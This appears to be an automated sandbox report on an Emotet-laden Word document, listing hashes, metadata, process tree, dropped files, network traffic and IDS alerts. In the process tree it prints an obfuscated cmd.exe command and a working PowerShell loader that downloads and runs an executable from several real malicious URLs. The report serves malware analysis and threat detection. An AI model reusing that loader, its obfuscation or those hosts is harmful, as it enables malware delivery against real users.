download: | 112018 |
Full analysis: | https://app.any.run/tasks/0a931763-f528-4644-8574-c0752918abc8 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 14, 2018, 15:59:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Madison, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 12:45:00 2018, Last Saved Time/Date: Wed Nov 14 12:45:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | 38CBBEB27E5FD57F183F519BAF5A0674 |
SHA1: | D7406FADC1F8189A4F37ADB6BD7240598314E302 |
SHA256: | 6B80EEB2B9D7E86B14E12EE8858DAAF12F92C0AC0340CD6B95E5691FF373591C |
SSDEEP: | 1536:YZuocn1kp59gxBK85fBt+a9eV6r2EBDxoRwBnRDhYxjhUx5xfxThoxtBqBYRM6Ug:441k/W48bFDxoRwBnRDhYxjhUx5xfxT0 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 14 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 13 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:11:14 12:45:00 |
CreateDate: | 2018:11:14 12:45:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Madison |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3600 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\112018.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2756 | cmd /V/C"^se^t ^oI^Q^1=AO(B=2@^a8^U^T^EICG^iS^[^Xk^y\6rc nbF^f^xo^$^e+^Y^WVp^m;^M3/^{^uqt^jLRP^-'^]^Kh^:^d^D^H^,N)^s^.w}0lv1&&^f^or %N ^in (3^8^;^3^1;^6^6;^3^3;23;6^4^;^56^;3^3^;69^;6^9;25^;3^2;1^5;5^8^;4^9^;4;^53^;^5^0^;^2^7^;^45;53^;^40^;^32^;^1^5^;^51;37;^4;5^3^;5^6^;47^;^4^7;^3^8^;^57^;43^;43^;^24;^52;^4^7^;6^5^;24^;31;^39;^6^5;7^;4^5;4^3;51;64^;38^;0^;41^;27^;45^;^1^6;58;5;^6^;^5^6^;^47;^47;^3^8;^5^7;43^;43;64;^56^;^7^;48;^1^5;64;^5^6^;^7;^6^9^;3^1;39;^65;^2^4^;^31^;39^;^43^;28;^1;60;22;^42^;22^;^46;^3^7^;6;5^6;4^7;4^7;^3^8^;5^7;4^3^;4^3^;^38;^47;^3^3^;^7;^2^4;^7;^58;33;^3^9;^1^5;24;^7^0^;^3^1;^45^;2^4;56;3^3^;2^3;65^;^15^;26^;^43^;8^;^6^9;^37^;^23^;^45;3^6;7;^6;56;^47^;47;^3^8;57^;4^3^;43;^8;22^;^2^2;^7;3^8;^3^8;^6^9^;15^;^7;^26;2^4;33^;^65;^2^4;3^1^;^3^9^;^43;^3^5;^22;^10;0;3^8^;24;^18^;8;0;^6^;^5^6^;^47^;4^7^;38;5^7^;^4^3^;^4^3^;3^8^;^69^;7;26;^3^3^;47;3^3;^2^9;7;^4^5^;2^6;33;^65^;^24^;^31;39^;4^3;^20;45;7;^1^5^;^4^8;^49^;9^;^1^4^;^6^9^;^6^2;^5^3^;^6^5;^1^6^;^3^8;69^;1^5^;^47;2;^5^3;6;5^3;^6^3^;4^0;32;^0;35;^13;4^;^2;^17^;1^6;20^;^6^4;^47^;^33^;^39;6^5;^12^;^1;6^5;^5^1^;^7;4^7;56^;^5^4^;^57^;5^7^;1^4;33^;^47;^10;3^3^;3^9;^38^;5^1;7;47;56;^2^;^6^3^;34;53^;^21^;4^9^;^55^;18;^6^5^;^3^3;30^;^33;53^;63;40^;^3^2;36^;^9^;5^6^;2^5^;^4^;^6^2;^3^3^;66;^5^2;^1;^2^7;48^;3^3;^2^4^;^4^7;2^5;^52;2^4;^3^1;^3^9^;^2^5;5^3^;39;^6^4;3^0^;^3^9;^69^;^5;^65^;30;^3^9;^6^9^;^56^;47^;47;^38^;5^3;^40;3^2;48;4^5^;^1^8;^25;^4^;^25^;^62^;33;^6^6^;5^2^;1;^27;^4^8^;^33;^24^;47;2^5;^5^2;2^4^;3^1;^3^9^;2^5^;^5^3^;^7^;^5^8^;31^;^5^8^;27^;6^5^;^64;^4^7^;23^;33^;^7;^39;5^3;4^0^;29;^3^1^;^2^3^;33;7;^24;^5^6^;2^;32;^37^;49;5^9;25^;1^5^;26;25^;32;15^;51^;3^7;6^3;4^4^;47;^2^3;20^;4^4;3^2;36^;^9;56^;^65^;31^;^38;^3^3^;^2^6;2;^5^3;14^;1^1;^1^0^;5^3;^61^;3^2;^37;4^9^;59;61;68^;6^3^;^40;^32;^3^6;^9;^56^;6^5^;6^4;^3^3^;^26^;^5^8;^2^;6^3;4^0^;^3^2^;^4^8;^45;1^8^;65;^3^1^;38;3^3^;26;^2;^6^3;40;32;^48^;^4^5^;1^8;65;47;20^;38;^3^3^;^2^5^;^4;^25^;^7^1;40^;^3^2;^48^;^45;^18;^65^;^6^6^;^23^;^15;^47;^33^;^2^;^3^2;^36^;9^;5^6;^6^5^;2^3^;^3^3;^64;3^8;^31^;^26;6^4^;3^3^;^3;3^1^;^58;^2^0^;63;4^0^;^3^2;^48;45^;1^8;^6^5^;^64^;^7^;70;3^3^;^47;^31;29;1^5;^6^9^;33;2;32^;^0^;^3^5^;13^;6^3^;^40^;^16^;^47^;^7^;23;4^7;5^2^;^5^1^;23;3^1^;^2^4;^33^;6^4;^64;^25^;32;^0;3^5;13^;40;^2^7^;23;^33^;7;1^9^;67^;2^4;7;4^7;^2^4;56^;^44^;6^7;67;^2^5;25^;^25^;^25;^25;^25^;2^5;25^;^2^5;2^5;2^5;^2^5^;25^;^25;2^5;2^5^;2^5^;82)^do ^s^e^t u^1^e^J=!u^1^e^J!!^oI^Q^1:~%N,1!&&^i^f %N ^g^tr ^81 cal^l %u^1^e^J:*u1e^J^!^=%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2360 | powershell $idL='Rbu';$iPV='http://c-t.com.au/PspAMbuSd2@http://shajishalom.com/FOH636qV@http://pteacademicvoucher.in/8lVruWa@http://866appliance.com/Y6TApcX8A@http://planetefaune.com/yuaijLUGlN'.Split('@');$AYC=([System.IO.Path]::GetTempPath()+'\LKX.exe');$WUh =New-Object -com 'msxml2.xmlhttp';$juX = New-Object -com 'adodb.stream';foreach($VLD in $iPV){try{$WUh.open('GET',$VLD,0);$WUh.send();$juX.open();$juX.type = 1;$juX.write($WUh.responseBody);$juX.savetofile($AYC);Start-Process $AYC;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3060 | "C:\Users\admin\AppData\Local\Temp\LKX.exe" | C:\Users\admin\AppData\Local\Temp\LKX.exe | — | powershell.exe |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Exit code: 0 Version: 8.0.0.0 | ||||
3684 | "C:\Users\admin\AppData\Local\Temp\LKX.exe" | C:\Users\admin\AppData\Local\Temp\LKX.exe | LKX.exe | |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Exit code: 0 Version: 8.0.0.0 | ||||
3468 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | LKX.exe | |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Exit code: 0 Version: 8.0.0.0 | ||||
3944 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Version: 8.0.0.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3600 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8B2D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2360 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ENYDY2Q44355OL559LQ6.temp | — | |
MD5:— | SHA256:— | |||
3600 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:70C278D8BB09C3041479A9BC2AF4E1A9 | SHA256:D69E23B5D0FBBBEA2B15D68BAE73B8D21CB5A54E7F9352E099020E7F51DABA60 | |||
3600 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$112018.doc | pgc | |
MD5:9C8FE6C73F0652D5FFBA85911291A982 | SHA256:2B9490E6CB60288BD371FC025243207DD4A0256330E008BB09BB5EE174A5FF5E | |||
2360 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C5E84CFB7FDA503A7F95914AD626D14 | SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D | |||
2360 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF169782.TMP | binary | |
MD5:0C5E84CFB7FDA503A7F95914AD626D14 | SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D | |||
2360 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat | dat | |
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862 | SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A | |||
3684 | LKX.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:1971BD3C2B25CE33550085B93144EBFB | SHA256:D6DD56E7FB1CC71FC37199B60461E657726C3BF8319CE59177AB4BE6ED3B9FB4 | |||
2360 | powershell.exe | C:\Users\admin\AppData\Local\Temp\LKX.exe | executable | |
MD5:1971BD3C2B25CE33550085B93144EBFB | SHA256:D6DD56E7FB1CC71FC37199B60461E657726C3BF8319CE59177AB4BE6ED3B9FB4 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2360 | powershell.exe | GET | 301 | 50.62.194.30:80 | http://c-t.com.au/PspAMbuSd2 | US | html | 196 b | suspicious |
2360 | powershell.exe | GET | 200 | 50.62.194.30:80 | http://c-t.com.au/PspAMbuSd2/ | US | executable | 420 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3944 | lpiograd.exe | 177.242.156.119:80 | — | SERVICIO Y EQUIPO EN TELEFONÍA INTERNET Y TV S.A. DE C.V. | MX | malicious |
2360 | powershell.exe | 50.62.194.30:80 | c-t.com.au | GoDaddy.com, LLC | US | suspicious |
3944 | lpiograd.exe | 50.78.167.65:7080 | — | Comcast Cable Communications, LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
c-t.com.au |
| unknown |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
2360 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2360 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
2360 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |